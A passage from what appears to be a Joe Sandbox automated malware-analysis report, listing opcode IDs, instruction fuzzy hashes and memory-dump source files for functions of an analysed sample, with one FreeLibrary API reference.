                                                                                        • Opcode Fuzzy Hash: 01f10ef63025d853010bbcd235c1ddb8abbacb0ba491801d8f95867e39bd8927
                                                                                        • Instruction Fuzzy Hash: 8201282160D7518BD319CB699891327FBE2ABDA704F18945ED0CBD7310C528CD02874A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c58d02ebaa07ec1e1fea080d4339b4adfe33acf4ab0c07667cedffec637d70dd
                                                                                        • Instruction ID: f13f00f0c8a70f1d28c6c4ed864673e148b489c637e08a14a3dba3d71d0b49dd
                                                                                        • Opcode Fuzzy Hash: c58d02ebaa07ec1e1fea080d4339b4adfe33acf4ab0c07667cedffec637d70dd
                                                                                        • Instruction Fuzzy Hash: 0301D8752596908BD30C4E96E49073A7399FB8E301F18A82DC58157585C33C98128B4A
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID: !$0
                                                                                        • API String ID: 3664257935-301933775
                                                                                        • Opcode ID: 1189a14c2e03e33d76359297ff69926890f5b3ff588148c970a931e24a5c6e84
                                                                                        • Instruction ID: 8089f0fe5ca6fce70c99fb323ceddf2335f4613cfab82a8f1a00c8b6f01cb96d
                                                                                        • Opcode Fuzzy Hash: 1189a14c2e03e33d76359297ff69926890f5b3ff588148c970a931e24a5c6e84
                                                                                        • Instruction Fuzzy Hash: CB8147315083908AC7388B29885177ABFE2AFD6344F28866ED4D69B391D63C8D49C756